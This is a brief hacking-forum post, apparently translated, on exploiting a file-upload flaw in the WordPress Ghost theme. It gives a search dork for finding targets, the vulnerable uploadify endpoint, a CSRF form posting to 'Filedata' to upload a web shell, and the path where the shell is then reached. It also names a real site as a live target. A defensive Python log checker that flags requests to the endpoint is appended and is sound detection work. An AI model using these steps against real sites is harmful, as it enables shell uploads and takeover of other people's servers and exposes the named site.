Straight to it, bro
1) dork: inurl:wp-content/themes/Ghost/
develop it further with your weeb brain
2) exploit: /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
3) Vulnerability ~ {"status":"NOK", "ERR":"This file is incorect"}
4) open a csrf form (open it, bro), an online csrf also works
post to Filedata ~> remember, the post field is Filedata
5) upload successful, just access the file
how to access: http://target.com/wp-content/uploads/settingsimages/ your shell or script
if you're lucky you can get one where you can upload a shell
http://www.juvankoski.com/wp-content/uploads/settingsimages/xxx.html
live target:
that's all, wassalamualaikum wr.wb
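Added here as a defender-side example, not part of the original post: a Python checker that flags, in Apache combined-format access logs, POSTs to the Ghost theme's uploadify endpoint described above and fetches of non-image files from /wp-content/uploads/settingsimages/. The log lines are constructed samples and the IPs are documentation placeholders.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample lines in Apache combined format (IPs are RFC 5737 placeholders).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2014:10:01:02 +0000] "POST /wp-content/themes/Ghost//includes/uploadify/upload_settings_image.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:10:01:09 +0000] "GET /wp-content/uploads/settingsimages/xxx.html HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2014:10:02:00 +0000] "GET /wp-content/uploads/settingsimages/logo.png HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2014:10:02:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Endpoint from the post; theme directory is compared case-insensitively after normalisation.
UPLOADER = "/wp-content/themes/ghost/includes/uploadify/upload_settings_image.php"
UPLOAD_DIR = "/wp-content/uploads/settingsimages/"
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def classify(line):
    """Return (finding, ip, raw_path) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw_path = urlparse(m["path"]).path
    # Collapse repeated slashes ("Ghost//includes") so path tricks do not dodge the match.
    norm = re.sub(r"/+", "/", raw_path).lower()
    if m["method"] == "POST" and norm.endswith(UPLOADER):
        return ("upload_endpoint_post", m["ip"], raw_path)
    if UPLOAD_DIR in norm:
        ext = os.path.splitext(norm)[1]
        if ext not in IMAGE_EXT:
            return ("non_image_in_settingsimages", m["ip"], raw_path)
    return None


def scan(log_text):
    """Run classify() over every line and collect the findings in order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for kind, ip, path in scan(SAMPLE_LOG):
        print(f"{kind}: {ip} -> {path}")
```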